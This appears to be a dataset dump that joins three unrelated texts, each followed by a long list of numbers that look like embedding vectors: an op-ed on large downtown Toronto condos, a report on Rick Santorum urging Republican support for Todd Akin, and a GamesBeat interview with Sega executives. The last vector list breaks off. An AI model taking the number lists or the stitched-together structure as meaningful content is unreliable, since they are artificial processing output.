It’s a frequent refrain from young condo-dwellers looking to upsize or start a family without fleeing to the suburbs: Why aren’t there more large units downtown? A recent report by the City Building Institute (CBI) at Ryerson University and a survey by Environics Research both highlighted the need for three-bedroom units in Toronto, arguing that developers and builders are ignoring the demand for larger units by young professionals and baby boomers. The axioms of urban economics, however, explain why large condominiums are ill-suited for very dense urban cores. Like other vibrant downtowns in Manhattan and London, Toronto has a tightly clustered financial district that is also home for some young professionals who are mostly unmarried, without children and rent smaller-sized condominiums. A key to the development puzzle lies in the gap between the stated preferences of these young renter professionals (“Wouldn’t it be nice to start a family downtown?”) with the revealed preferences of young households with children (“The suburbs it is”). On a per-square-foot basis, a three-bedroom condominium downtown will always be significantly more expensive than a similar-sized townhouse in a suburb. Why? Land prices. Downtown land is in huge demand because it is scarce, which leads to high prices and high-rise buildings. Condo sizes are smallest in places with the highest land prices. Contrarily, places with less expensive land attract larger units, as per the first axiom of urban economics: Prices adjust to achieve locational equilibrium. For economic efficiency, scarce and high-priced land must be used for high-density office and residential land uses. Smaller sized units, and not three-bedroom condos, are a more efficient residential use of scarce land that permits more workers to be near their jobs in the financial core. So, what to do with the unmet demand for large condos? Well, if there really were an unmet economic demand, builders would have responded to it. Evidence of actual pent-up demand for owner-occupied three-bedroom condos, it turns out, is rather elusive. Recent Environics surveys found young professionals complained of a lack of three-bedroom condos (a stated preference), but did not necessarily show an interest in owning large condos themselves. In fact, 81 per cent of respondents said that they did not want a condo at all, with most desiring a detached home. Environics found that young professionals were predominantly renters and that 83 per cent did not have children. Builders respond to revealed preferences and not stated preferences. They are aware of life-cycle triggers, such as the birth of a first child, which increases the demand for space and pushes young families to the suburbs where cheaper land makes owning larger houses possible. The suburbs, as a result, have become better equipped to cater to families with children: restaurants there always have plenty of high chairs, but try showing up with three children at an upscale downtown restaurant for dinner and watch the staff scramble. The suburbs also have an abundance of soccer fields, playgrounds, parks, hockey arenas, and parking lots for vehicles stuffed with sporting equipment. When, by contrast, was the last time you saw a parent travelling with hockey bags and children on a subway? Renters, and not investors, generate the demand for shelter space in and around downtowns. Investors respond to the demand by providing one and two-bedroom units to renters. As it is, downtown residential rents barely cover the ownership costs of investors who effectively subsidize the renting young professionals. If three-bedroom condos in the downtown core made more cents for investors, they might make more sense for builders. In the end, it is all land economics. Murtaza Haider is an associate professor at Ryerson University. Stephen Moranis is a real estate industry veteran. They can be reached at [email protected].
[ 0.10971233993768692, -0.02116023376584053, 0.006913680117577314, 0.03255826607346535, -0.02271818369626999, 0.029615193605422974, -0.08431411534547806, 0.003826659871265292, 0.027137186378240585, 0.06490351259708405, 0.04567935690283775, -0.041849907487630844, -0.005886800587177277, 0.007293750997632742, 0.06526575982570648, -0.007811659947037697, 0.08212413638830185, -0.03406970202922821, -0.005238147918134928, 0.023757444694638252, -0.043183766305446625, -0.0632023736834526, 0.033940430730581284, -0.014268319122493267, 0.0441180020570755, 0.016059868037700653, 0.004915272817015648, 0.04722137004137039, -0.002496049040928483, 0.08686963468790054, 0.07744491845369339, 0.07371790707111359, 0.08523454517126083, 0.020562810823321342, 0.09635104238986969, 0.04363347217440605, -0.009327379055321217, 0.08144361525774002, 0.03464369848370552, 0.008120311424136162, 0.05144016072154045, -0.027820147573947906, -0.04596652463078499, 0.015507476404309273, -0.08069770783185959, -0.049640756100416183, -0.027793915942311287, 0.004181838594377041, 0.02955729514360428, -0.08653552085161209, 0.07334260642528534, 0.03723743185400963, 0.019785426557064056, 0.00040717542287893593, 0.0012509612133726478, 0.023229582235217094, -0.0377771258354187, 0.035842929035425186, 0.0689467266201973, -0.011543975211679935, 0.007988329976797104, 0.004319820087403059, -0.007707677781581879, -0.0468389056622982, 0.023044517263770103, -0.07078222930431366, -0.010194976814091206, 0.07318954914808273, -0.03470843285322189, -0.040117498487234116, 0.05249533802270889, -0.009703008458018303, -0.08808767795562744, 0.0010218089446425438, 0.042403969913721085, -0.029196321964263916, 0.01583823561668396, 0.01135605201125145, 0.011916379444301128, -0.05835859104990959, 0.05760621279478073, -0.015132623724639416, -0.059563010931015015, 0.020170606672763824, -0.08359894901514053, 0.030889669433236122, 0.010909578762948513, -0.07685452699661255, -0.014654278755187988, -0.022537216544151306, 0.011478307656943798, 0.06158645078539848, -0.09712479263544083, 0.005751443561166525, 0.023987550288438797, -0.03538110479712486, -0.10820423066616058, -0.07380082458257675, -0.04953431338071823, 0.002807583659887314, 0.0005081639974378049, -0.012894117273390293, 0.14001822471618652, 0.03379342705011368, -0.049686186015605927, -0.14212679862976074, 0.018318232148885727, 0.01807326450943947, 0.0021681776270270348, 0.05160464718937874, 0.010518788360059261, -0.023177985101938248, -0.04121722653508186, 0.039241496473550797, -0.005972818471491337, -0.055717021226882935, 0.05697993189096451, -0.029217949137091637, 0.06762208789587021, 0.03956899046897888, 0.019000990316271782, -0.0002590824442449957, -0.13523970544338226, -0.03418276086449623, 0.019407786428928375, -0.04142807424068451, -0.03803861886262894, 4.635734623200468e-33, -0.0747184231877327, 0.056767869740724564, -0.0545264407992363, 0.0947037860751152, 0.00039183293120004237, -0.07327330112457275, 0.003541726153343916, 0.021504711359739304, 0.029955601319670677, 0.05628613382577896, 0.06388837099075317, -0.023770509287714958, 0.016087062656879425, 0.05657689645886421, 0.07008358836174011, 0.02525753527879715, -0.08406426012516022, 0.0021937163546681404, -0.043258391320705414, 0.0029696403071284294, -0.010236156173050404, 0.09392452239990234, 0.02433938905596733, -0.07999380677938461, -0.06009102612733841, -0.1475764513015747, 0.016388779506087303, 0.032072145491838455, 0.0019411909161135554, -0.016380026936531067, -0.029253443703055382, 0.06852522492408752, 0.01850905455648899, 0.024811776354908943, 0.013880652375519276, 0.039027709513902664, 0.006680716294795275, -0.041452180594205856, -0.11865941435098648, -0.028298093006014824, -0.1439972221851349, -0.036183688789606094, 0.013877412304282188, 0.01930929534137249, 0.12156989425420761, 0.07391128689050674, 0.04515419155359268, -0.05812377482652664, -0.07615803182125092, -0.0038542456459254026, 0.094810351729393, 0.05593710020184517, -0.1347927749156952, 0.014258773997426033, -0.054127346724271774, 0.03820125758647919, 0.010639163665473461, -0.05160273611545563, 0.03377055376768112, -0.035302501171827316, -0.06497874855995178, -0.05105045810341835, -0.02922111377120018, -0.0034543927758932114, -0.05851447209715843, 0.012785330414772034, 0.018995314836502075, 0.08897622674703598, 0.12109040468931198, 0.05401131883263588, 0.05501468852162361, -0.022101392969489098, -0.004134022165089846, -0.023450449109077454, 0.08453845232725143, 0.01028862688690424, -0.07572996616363525, 0.0825239047408104, 0.038560520857572556, -0.057057980448007584, 0.03668497875332832, 0.016868945211172104, 0.0007524331449531019, 0.030774807557463646, 0.12371443212032318, -0.032109927386045456, 0.01493801735341549, 0.017909208312630653, -0.018058234825730324, -0.019418783485889435, 0.028877750039100647, -0.011225054040551186, 0.0105430381372571, 0.00787352304905653, -0.017324747517704964, -7.038124019386655e-33, -0.010243822820484638, -0.029787151142954826, -0.01639394275844097, -0.05331941321492195, -0.05091037228703499, 0.025309238582849503, -0.04550354927778244, -0.11520049721002579, 0.0312713161110878, -0.013400794006884098, -0.10275096446275711, -0.027341356500983238, 0.0902598425745964, 0.02226470410823822, -0.020984463393688202, -0.0016976683400571346, 0.04011649265885353, -0.024236580356955528, -0.025596845895051956, 0.008235648274421692, 0.04375924542546272, -0.029919741675257683, -0.03502378612756729, 0.02628735825419426, -0.022536564618349075, -0.03178233653306961, -0.1325988471508026, 0.012818336486816406, -0.002745566423982382, 0.0038890119176357985, -0.07791179418563843, 0.005250689573585987, 0.01068162638694048, 0.016651904210448265, 0.010845103301107883, -0.0016853752313181758, -0.01734142005443573, -0.015408117324113846, -0.06296049058437347, 0.0443267747759819, -0.02883189730346203, -0.08314026892185211, -0.012388628907501698, -0.025243548676371574, 0.04347569867968559, -0.012978939339518547, 0.04826682433485985, -0.03352130576968193, -0.02897292748093605, 0.06106365844607353, 0.0824369415640831, 0.04559451714158058, -0.035075657069683075, 0.037571828812360764, 0.004191136918962002, -0.0043625254184007645, 0.07090394198894501, 0.013758151791989803, -0.04096056520938873, 0.054046034812927246, 0.03453787416219711, 0.032058678567409515, -0.0264001302421093, 0.12847764790058136, -0.04117826372385025, -0.009926917962729931, -0.051824845373630524, -0.07414194196462631, -0.0013140164082869887, -0.007948004640638828, -0.08211660385131836, -0.05431731790304184, -0.030284393578767776, -0.09802619367837906, -0.10139301419258118, -0.01870466209948063, 0.05114626884460449, -0.026693981140851974, 0.02235039696097374, 0.02984759397804737, -0.024682169780135155, -0.004031957592815161, -0.00924211647361517, 0.002867836970835924, 0.0043953596614301205, -0.111759714782238, -0.02605375275015831, -0.03172694891691208, -0.03258639946579933, 0.06000331789255142, -0.0036186466459184885, 0.043229151517152786, -0.050073809921741486, -0.05273706093430519, -0.019583240151405334, -5.967837779508045e-8, 0.0033208304084837437, 0.05824634060263634, -0.06955646723508835, -0.04285005107522011, 0.024657003581523895, -0.09396529197692871, 0.0051957909017801285, 0.06143013387918472, 0.04815445840358734, 0.13191694021224976, 0.013903099112212658, 0.049529287964105606, -0.027901316061615944, 0.011557266116142273, -0.06909272074699402, 0.011558035388588905, 0.012224262580275536, -0.06966877728700638, -0.021855100989341736, 0.03065323829650879, 0.01914876699447632, 0.038471221923828125, -0.06905622035264969, 0.04955366626381874, -0.004847785457968712, -0.02434575743973255, -0.09648619592189789, 0.04255034029483795, -0.006929784547537565, 0.029104959219694138, 0.03808112442493439, 0.06312457472085953, -0.061050932854413986, -0.030693294480443, 0.026964936405420303, 0.01190858706831932, 0.036829084157943726, 0.07742252200841904, 0.02774324268102646, -0.06434276700019836, 0.03534139320254326, -0.11741495132446289, -0.0675574392080307, -0.03875748813152313, 0.06415745615959167, -0.01379977073520422, -0.053049616515636444, 0.042633362114429474, 0.014162852428853512, 0.031675416976213455, -0.041964855045080185, -0.004663947969675064, -0.028954166918992996, -0.020888613536953926, 0.06909025460481644, -0.07609003782272339, -0.10417428612709045, 0.024410678073763847, 0.003420258639380336, -0.019088488072156906, 0.021224604919552803, 0.032736968249082565, 0.007801209110766649, 0.039545346051454544 ]
BARNESVILLE, Ohio -- Rick Santorum on Saturday said the entire Republican Party should voice its support for Senate candidate Todd Akin of Missouri -- including the top of the party's presidential ticket. After holding a rally for Republican presidential nominee Mitt Romney here in the heart of Ohio's coal country, Santorum told NBC News that an Akin victory is essential for the GOP to regain control of the Senate and repeal President Barack Obama's health care law. The only way for that to happen, Santorum said, is for the GOP establishment to give the embattled Akin its full-fledged support. "The entire Republican Party should stand up and say, 'You know what? He's our candidate, it's too important for the future of our country not to have a majority of the Senate in this upcoming election," Santorum said when asked if Romney needs to publicly support Akin. "I'm hoping everybody will join in and support the cause." The former Pennsylvania senator and unsuccessful president candidate joined South Carolina Sen. Jim DeMint in announcing their support of Akin on Wednesday. "I don't know what the Republican establishment -- what their objective is, but if they want to repeal Obamacare, we better hold the Senate. And to hold the Senate, we better win Missouri," Santorum said. Akin has taken heat from both sides of the aisle after using the term "legitimate rape" and saying women have a biological way of preventing unwanted pregnancies while he gave a now-notorious explanation of his views on abortion. "My feeling is that we can win the presidency, but if we don't have 51 senators, we're not going to be able to repeal Obamacare," said Santorum. Romney's former rival has been active campaigning for the presidential candidate in the Buckeye State. It's a primary Santorum nearly won on Super Tuesday, and his support was particularly strong in this part of the state, heavy with blue-collar workers and not far from his home of Pittsburgh. Despite recent polls showing Romney needing to make up significant ground in Ohio, the former senator remained optimistic about the state turning red. "I'm confident that Mitt Romney will win Ohio, will when the presidency," he said. "People here understand how dangerous this president is." That danger, Santorum said, stems from the president's energy policy, which he claims makes the U.S. more dependent on foreign oil. It is a message the Romney campaign hopes will resonate in this coal-rich part of the state. It is here where Republicans go to hammer Obama for waging a "war on coal." "This is a president that is going to drive this country to economic ruin because of a phony ideology that, you know, somehow or another he has to control the seas rising and falling," Santorum said. While Santorum has been traveling as a Romney surrogate, he also has been holding events in places like Iowa independent of the presidential race. It has fueled speculation that he could be eyeing another run. Asked about his political future, Santorum would only say that he will be happy in 2016 to continue his work as a Romney surrogate. "I'll be happy to come back and campaign for Gov. Romney in four years," he said.
[ -0.08190799504518509, -0.0574115626513958, 0.0628962442278862, -0.09733320027589798, 0.043608784675598145, 0.04484682157635689, 0.06492678076028824, 0.0036948779597878456, -0.0729830339550972, -0.04866780713200569, -0.010328201577067375, 0.08814366906881332, -0.031980376690626144, -0.04908084124326706, -0.005656324792653322, 0.08689698576927185, 0.03033396415412426, 0.03526068851351738, 0.004044999834150076, 0.1119619831442833, -0.09687992185354233, 0.056876473128795624, 0.001767483539879322, 0.030893223360180855, 0.028196269646286964, 0.08878916501998901, 0.01273614726960659, -0.03126894682645798, -0.03169205039739609, 0.05663736164569855, 0.04653789475560188, -0.07094476372003555, -0.029562100768089294, -0.0012327590957283974, 0.031138917431235313, -0.09988698363304138, -0.05658218637108803, 0.07074237614870071, -0.015809034928679466, 0.03287118673324585, -0.0337255522608757, 0.045285601168870926, -0.06758935004472733, 0.009790207259356976, 0.02385563775897026, -0.01799245923757553, 0.007749877870082855, 0.018849564716219902, 0.014861132949590683, -0.07516264170408249, -0.04741554334759712, -0.051865413784980774, 0.009605903178453445, -0.02782779186964035, -0.021729109808802605, 0.08587467670440674, -0.061233438551425934, 0.005919539835304022, -0.060626715421676636, 0.03346846252679825, 0.04691644757986069, -0.020709192380309105, 0.01103003416210413, 0.03382343426346779, -0.07632233202457428, 0.09787585586309433, -0.020655572414398193, -0.00784999318420887, -0.11125498265028, 0.0009613102301955223, 0.06447897851467133, -0.0231593269854784, 0.016910500824451447, 0.013922742567956448, 0.01967291533946991, -0.08433922380208969, 0.03953435644507408, 0.06318628042936325, 0.09225013852119446, 0.04388842359185219, -0.04710575193166733, -0.006158823147416115, -0.005147439893335104, -0.06014664098620415, 0.008308649994432926, 0.003251024056226015, -0.08258579671382904, 0.0033787924330681562, 0.007680700626224279, -0.052716150879859924, -0.09253622591495514, -0.03404458984732628, -0.0226075891405344, -0.029769139364361763, 0.08322245627641678, 0.09297934174537659, -0.012276198714971542, -0.014121261425316334, -0.030002929270267487, 0.07839281111955643, -0.05628877133131027, 0.04940013587474823, 0.011644993908703327, -0.08629293739795685, 0.023151131346821785, 0.004459735006093979, -0.04466991499066353, 0.06266259402036667, 0.08788575977087021, 0.04865698888897896, -0.020619837567210197, 0.013803184032440186, 0.03485645353794098, 0.04516521468758583, -0.056834232062101364, -0.04801261052489281, 0.05734961852431297, 0.018385814502835274, -0.01916850171983242, 0.06263179332017899, -0.01285087876021862, 0.012192316353321075, -0.041200585663318634, 0.06445314735174179, 0.06793119013309479, -0.0766286849975586, -0.04770096391439438, 2.9040165493782286e-33, 0.027572251856327057, 0.04732110723853111, 0.03829166293144226, -0.019053831696510315, -0.02922159805893898, 0.060267023742198944, -0.005416565109044313, -0.15474309027194977, -0.07619725167751312, -0.015381019562482834, -0.07711218297481537, 0.02286338247358799, 0.01613624393939972, 0.001063306350260973, -0.11181487888097763, -0.02414873242378235, -0.10449807345867157, 0.10686428844928741, -0.05117131769657135, -0.08716889470815659, 0.03540771082043648, 0.011872027069330215, -0.04270296171307564, 0.028097037225961685, -0.02261519245803356, -0.07575196027755737, 0.0068626427091658115, 0.08143873512744904, -0.015441018156707287, 0.03158245235681534, -0.04759892076253891, 0.014088897965848446, -0.04132843017578125, 0.01197624858468771, -0.011450611054897308, -0.05750340595841408, -0.03524239733815193, -0.03407544270157814, -0.09896066784858704, -0.02379331924021244, 0.018197569996118546, 0.11991444230079651, -0.0268169604241848, 0.07280109822750092, 0.023045625537633896, -0.07743752002716064, 0.12286151200532913, 0.047194987535476685, -0.008891390636563301, -0.06475833058357239, -0.011258604004979134, -0.013363818638026714, 0.07601983100175858, 0.051177218556404114, -0.024020446464419365, -0.051042620092630386, -0.00015940277080517262, 0.060562942177057266, 0.012731394730508327, -0.020142747089266777, 0.01827799528837204, -0.02949610911309719, -0.07624058425426483, -0.06099908798933029, -0.07085909694433212, -0.06472310423851013, -0.07982752472162247, -0.026515591889619827, 0.021461227908730507, -0.03252093121409416, 0.10632428526878357, -0.018827032297849655, -0.10967466980218887, 0.029454611241817474, -0.07658793032169342, -0.031147869303822517, 0.03480276092886925, 0.041828371584415436, 0.083404541015625, -0.019883397966623306, -0.016110988333821297, -0.13869071006774902, 0.00474444730207324, -0.010590621270239353, 0.06309746205806732, 0.020817648619413376, 0.04852013662457466, -0.03485382720828056, 0.04208659380674362, 0.0024859823752194643, -0.0044808946549892426, 0.0816074013710022, -0.03828832134604454, -0.0058724358677864075, 0.005474627949297428, -3.947499945867296e-33, -0.1514187455177307, -0.03161872923374176, -0.01532153133302927, 0.0580768920481205, 0.05452931672334671, -0.0585668683052063, 0.005697697401046753, -0.06694380193948746, 0.087718665599823, -0.13070540130138397, -0.03296726197004318, 0.004156303126364946, 0.026259973645210266, -0.040749263018369675, -0.04782004654407501, 0.006406211294233799, 0.05379292368888855, -0.02309332974255085, 0.009898211807012558, -0.01601225882768631, 0.01990109495818615, 0.043657563626766205, -0.03624113276600838, 0.0366358645260334, -0.020885944366455078, 0.02505485713481903, -0.01382542122155428, 0.011206909082829952, -0.0026935238856822252, 0.004438566975295544, -0.05909161642193794, -0.035664401948451996, -0.03730335459113121, -0.025513460859656334, 0.05771443992853165, 0.07536017149686813, -0.10548663139343262, -0.023979049175977707, -0.025091886520385742, -0.03171367198228836, 0.10751450806856155, -0.05505809187889099, 0.01388753205537796, 0.004752517677843571, -0.01341553870588541, 0.07709340006113052, 0.04761121794581413, 0.054585278034210205, 0.003102798480540514, 0.027821168303489685, -0.07895059883594513, 0.021229039877653122, 0.006404970772564411, 0.14195172488689423, 0.0019404999911785126, -0.002358805388212204, -0.04639400914311409, 0.049474745988845825, -0.048865482211112976, -0.017835674807429314, 0.030907565727829933, 0.050424717366695404, 0.021768011152744293, -0.010148946195840836, 0.06751188635826111, 0.007666447199881077, -0.0479106642305851, 0.002378591801971197, 0.013335321098566055, 0.041245464235544205, -0.08852966874837875, -0.04102584347128868, 0.00785026140511036, -0.02008986473083496, 0.029201656579971313, 0.022631607949733734, 0.03442668914794922, 0.02077188529074192, -0.033559929579496384, 0.012155609205365181, 0.01284403819590807, -0.04902747645974159, -0.041108518838882446, -0.06353425234556198, 0.0072448342107236385, 0.008348320610821247, -0.07073996961116791, -0.006985001731663942, 0.007574705872684717, 0.06280683726072311, -0.0006614439771510661, -0.046639010310173035, -0.04484511539340019, 0.06022930517792702, -0.06174749881029129, -6.502256155727082e-8, 0.07593890279531479, -0.02832309901714325, -0.040250759571790695, 0.008568970486521721, 0.05882098898291588, -0.012835167348384857, -0.008509863168001175, -0.02735176682472229, 0.023605315014719963, 0.010572701692581177, 0.11911793798208237, 0.08675239235162735, 0.011634526774287224, 0.002757495502009988, 0.049203984439373016, 0.047862082719802856, -0.039043720811605453, 0.02654091641306877, -0.04204394668340683, -0.05073658004403114, -0.019010841846466064, 0.026912642642855644, 0.06203426048159599, 0.06654570996761322, 0.05488342046737671, -0.01336440909653902, -0.04819988086819649, 0.0937751904129982, 0.02644307166337967, -0.017663754522800446, -0.03475164994597435, 0.00613086624071002, -0.06263525784015656, 0.01894696243107319, 0.012284929864108562, -0.009243994019925594, -0.08205120265483856, 0.0683673769235611, 0.07733282446861267, 0.018294354900717735, 0.011143868789076805, 0.05102907493710518, 0.03088902309536934, 0.018045738339424133, 0.002918199636042118, -0.00865346658974886, 0.04420865699648857, 0.07284631580114365, 0.00403131078928709, -0.07242948561906815, -0.09050732105970383, -0.003749483497813344, 0.020247941836714745, 0.02401527762413025, -0.00001547738975204993, 0.030088070780038834, 0.004196357447654009, -0.02900438755750656, -0.012203056365251541, -0.04332159459590912, -0.043728284537792206, 0.007974780164659023, 0.03154664859175682, 0.03115808591246605 ]
Sega’s been awfully quiet about making noise in mobile and digital. They’re obviously active in both spaces, but we never seem to hear much about it. Or maybe that’s just us not doing our jobs. We recently interviewed two executives from the online and digital sides to find out where the company is at during this console transition and recent boom in mobile, and they were quick to point out their big successes there (naturally). But they also recognize the huge challenges that still face them. How does a once-king in hardware — remember the Sega Genesis, Saturn, and Dreamcast? — deal with this new age of too many platforms? Senior director of digital marketing Mike Evans and director of online operations Ethan Einhorn sit down with GamesBeat to discuss. Image Credit: Sega GamesBeat: We’re in this transitional period where traditional consoles are still coming out, but the market doesn’t look anything like it used to. Sony’s main competition for consumer dollars and time may not be Microsoft but perhaps Apple instead. How does Sega view the market right now? Who are your consumers? Mike Evans: It’s a good question. Our audience is really all over the place. You have an audience that exists on the console platforms, for sure. Sega is still very much part of that picture. Then we have our audience who may also play on console but who exist on the mobile devices, who exist on tablets, who exist on PC. For Sega, rather than us defining a particular platform, what we’re trying to do is make sure that we can get our content out to all the places where our consumers exist. That’s key. You’re absolutely right. The market has changed fundamentally. But it’s also a really exciting place to be. Sega has been making mobile games since the feature phone days and at the forefront of the smartphone since 2008. Where the platforms are emerging and where there’s demand from consumers, Sega is going to be there. Ethan Einhorn: We’re taking, on the console side, more of a pillar approach. We’re doing some very exciting things with Sonic as a brand in the near future. We’re also very heavily focused on strategy, as you’ve seen with our pickup of [Company of Heroes developer] Relic, as well as what we’re doing with [Total War developer] Creative Assembly. Of course, we’re continuing to do core titles like Aliens: Colonial Marines. But as Mike was saying, we’re trying to appeal to our customers on any platform where they want to play. Mobile opens up the opportunity to allow us to go from a $60 price point to a price point of zero. What’s been interesting for us is to see who within Sega has been interested in moving into that mobile space. For instance, the head of R&D for Sega Games Network is Masayoshi Kikuchi, who was the director of Jet Set Radio. The person who is currently directing Kingdom Conquest II [also] directed Typing of the Dead. A lot of these classic Dreamcast-era designers are bringing their experience to bear now in the mobile space. GamesBeat: When you say you want to capture this wide range of potential gamers, would that include the purely mobile, casual, play-a-few-minutes-at-a-time Angry Birds crowd? Evans: Absolutely. We have games that service all different types and sets of consumers. Some [intellectual properties] lend themselves to maybe a younger audience. Some IPs are more classic in their stance; some maybe appeal to a more mature audience. We have titles like House of the Dead. That’s probably an example of a mature game. Then Sonic, which has been kind of reinvented. We’re bringing that to the Android platform. That’s an example of something which might skew slightly younger, as well as have this more classic base. Einhorn: Sonic Dash, which is popular right now on the top charts, is another great example of appealing to a more casual demographic. But again, within that same ecosystem we have Kingdom Conquest II, which is extremely core. Both of those comfortably coexist at the same publisher.
[ 0.0306325051933527, -0.06515762209892273, 0.10153202712535858, -0.09089246392250061, 0.026475636288523674, -0.002404187573119998, 0.0514773353934288, 0.03477923199534416, 0.004745799116790295, 0.015983715653419495, -0.0948561429977417, 0.03729105740785599, 0.00660560792312026, -0.08376772701740265, 0.07164514064788818, -0.0788390189409256, 0.019292909651994705, -0.06254561245441437, -0.03536413609981537, 0.004200153984129429, -0.025022432208061218, -0.05305856466293335, -0.046843886375427246, 0.011312047950923443, -0.00584594439715147, -0.02441547065973282, -0.012722872197628021, -0.0015893778763711452, 0.0032830960117280483, -0.031444013118743896, -0.0745362639427185, 0.026399964466691017, 0.0943978950381279, 0.05849871784448624, 0.035914741456508636, -0.09527697414159775, 0.04752926155924797, -0.059670597314834595, -0.08879699558019638, -0.0801142007112503, -0.024122409522533417, 0.02638348750770092, -0.03954955190420151, 0.04307224974036217, 0.030360521748661995, -0.0935778021812439, -0.0004118555225431919, -0.05152474343776703, -0.02564225159585476, 0.08602801710367203, -0.06293819099664688, -0.09558141976594925, 0.12162534147500992, -0.03209364786744118, 0.018345167860388756, 0.05852594971656799, 0.05991246551275253, 0.027076778933405876, 0.11153355985879898, 0.0595850795507431, 0.011978698894381523, -0.10939209163188934, -0.016086427494883537, 0.062204327434301376, 0.024306463077664375, 0.004558212123811245, 0.03242234140634537, 0.11403553187847137, -0.019955895841121674, -0.06557876616716385, -0.020975371822714806, -0.04056362062692642, 0.03576081246137619, 0.03901653736829758, 0.005122220143675804, -0.015674374997615814, -0.009983913972973824, 0.0076652709394693375, 0.059187740087509155, 0.03725052624940872, 0.08133693784475327, -0.09347226470708847, -0.1364951729774475, -0.026428014039993286, -0.019360138103365898, 0.028942007571458817, -0.05582577362656593, -0.03431803733110428, -0.06805899739265442, 0.04378899559378624, -0.06274323165416718, 0.0388946570456028, 0.031754471361637115, 0.00547407753765583, 0.03250247985124588, -0.004268125165253878, -0.022276530042290688, -0.0581941120326519, 0.0512375645339489, 0.047359053045511246, 0.0027623251080513, 0.08013655245304108, 0.050607189536094666, -0.04368140548467636, -0.05771452933549881, -0.07410643249750137, -0.04883613809943199, 0.05437358468770981, -0.03841467201709747, 0.07764594256877899, -0.0885956808924675, -0.006487073842436075, -0.05946703255176544, 0.04980124533176422, 0.029529841616749763, 0.027757132425904274, -0.04352395609021187, 0.07312549650669098, 0.03975732997059822, -0.015829699113965034, 0.005599218420684338, 0.02539018541574478, -0.05669131875038147, -0.010734500363469124, 0.015666255727410316, 0.010835831053555012, -0.06600210070610046, 5.387285558866255e-34, -0.037122469395399094, 0.026256460696458817, 0.016180898994207382, -0.011298277415335178, -0.02138269506394863, -0.0034167023841291666, 0.01088782399892807, 0.08521918952465057, 0.006373429670929909, 0.062219906598329544, -0.0026283052284270525, 0.049245938658714294, -0.05407213047146797, 0.008336182683706284, 0.07541477680206299, -0.07138455659151077, -0.027800124138593674, -0.028286831453442574, -0.01594618707895279, -0.003145023016259074, -0.023514268919825554, 0.024288494139909744, -0.02135828323662281, -0.01152708288282156, 0.002220869529992342, -0.03973564878106117, -0.08192278444766998, -0.0370340496301651, 0.09762585908174515, 0.04386259242892265, -0.1298462450504303, -0.04601520299911499, 0.03740868344902992, -0.03150250017642975, 0.07470723986625671, -0.024954797700047493, -0.018368640914559364, -0.03984351083636284, 0.022477732971310616, 0.03401883319020271, -0.05612466484308243, -0.04104141518473625, -0.12279503047466278, 0.008383139036595821, 0.010057713836431503, 0.07316127419471741, 0.013649162836372852, -0.10308890789747238, -0.02732635661959648, 0.06689923256635666, -0.025117330253124237, 0.056665223091840744, -0.0210206750780344, -0.017198214307427406, 0.0226314514875412, -0.03031458519399166, 0.015985798090696335, -0.12323062866926193, 0.01577550172805786, 0.02878173440694809, 0.014139561913907528, 0.06082351505756378, 0.030263548716902733, -0.006872238125652075, -0.051940880715847015, 0.10505862534046173, 0.11026155203580856, -0.005273765418678522, -0.09021115303039551, 0.03238927200436592, 0.005905663128942251, -0.03299472853541374, -0.0423162467777729, -0.010093693621456623, 0.001720972592011094, 0.021438563242554665, -0.08471962809562683, 0.06393329054117203, -0.03877141699194908, 0.002107640029862523, 0.0640474334359169, -0.0035665298346430063, -0.07942275702953339, 0.04252427816390991, 0.019166918471455574, 0.058217160403728485, 0.06415875256061554, -0.030269425362348557, -0.03326718881726265, 0.06206563115119934, -0.0880272313952446, -0.025090264156460762, -0.01447371020913124, 0.0750638097524643, -0.01940174587070942, -3.232263795953752e-33, -0.04497082158923149, -0.02689948119223118, -0.004729000385850668, -0.036236006766557693, -0.11093451827764511, -0.05661628395318985, -0.02739553339779377, -0.021200716495513916, 0.04894864931702614, -0.01283461693674326, -0.09097018837928772, 0.037636324763298035, 0.010318657383322716, 0.03709464892745018, -0.02338813990354538, -0.01569150574505329, 0.011562967672944069, -0.013118961825966835, 0.003925272263586521, -0.026389967650175095, 0.09184624254703522, -0.046694785356521606, -0.016007808968424797, 0.0672566369175911, 0.02516559511423111, 0.04555704817175865, -0.004124002996832132, 0.017842989414930344, 0.035964250564575195, -0.022392647340893745, -0.001985209295526147, -0.03781301528215408, 0.055748388171195984, -0.03381145000457764, 0.08542141318321228, 0.045399487018585205, 0.011479208245873451, 0.0033907743636518717, -0.005947128403931856, -0.049199555069208145, 0.0004942966625094414, -0.023978833109140396, -0.038729842752218246, -0.0008686617948114872, 0.008950927294790745, 0.04536009579896927, 0.028462566435337067, -0.024595502763986588, 0.019536685198545456, -0.03479255363345146, 0.0810471847653389, 0.06363479048013687, 0.04759451746940613, -0.050313275307416916, -0.058537162840366364, -0.01465397235006094, -0.06089562922716141, 0.006678180769085884, 0.005609489046037197, 0.05859708786010742, 0.06324227154254913, -0.024267185479402542, -0.023664260283112526, -0.05391469970345497, -0.01954718492925167, -0.03788848966360092, 0.15249280631542206, -0.026613563299179077, -0.043017879128456116, -0.013801801949739456, -0.01856769062578678, -0.004312050528824329, -0.04744468256831169, 0.01048860140144825, -0.0944233313202858, 0.06902085989713669, -0.11457652598619461, -0.06780938804149628, -0.04519890248775482, 0.006003864575177431, -0.00750065827742219, 0.14006786048412323, 0.03192940354347229, 0.014759806916117668, 0.019017383456230164, -0.00023224260075949132, 0.05025474727153778, 0.00698234373703599, -0.06502731889486313, -0.036284949630498886, 0.0035599777474999428, 0.012821215204894543, -0.08213045448064804, 0.039183855056762695, -0.04240211844444275, -5.765033250781926e-8, 0.05730290338397026, -0.07762687653303146, 0.0770820677280426, -0.019191619008779526, 0.0613100565969944, -0.01038599107414484, 0.008051058277487755, 0.005023809149861336, 0.06403183937072754, -0.001570400781929493, -0.027745135128498077, 0.015308544971048832, -0.06631586700677872, 0.08026963472366333, 0.08585474640130997, 0.06172553077340126, -0.07886537909507751, -0.017517900094389915, -0.027320057153701782, 0.04428018257021904, 0.055936217308044434, 0.0963493213057518, 0.018708987161517143, -0.0506422184407711, 0.02910279482603073, 0.029297402128577232, 0.00640915660187602, 0.0034842470195144415, 0.030841553583741188, 0.04003573954105377, -0.006599405314773321, -0.027056800201535225, -0.0785125270485878, -0.06342556327581406, -0.055671583861112595, -0.10737647116184235, 0.07058219611644745, 0.01812315359711647, 0.03816699609160423, -0.041825518012046814, -0.07548905164003372, -0.007455454207956791, -0.019684704020619392, 0.03888772055506706, -0.05109280347824097, -0.013303129933774471, -0.03756958618760109, 0.06198376789689064, -0.02643618732690811, 0.002370507223531604, -0.03852890431880951, 0.037964705377817154, -0.00963354017585516, 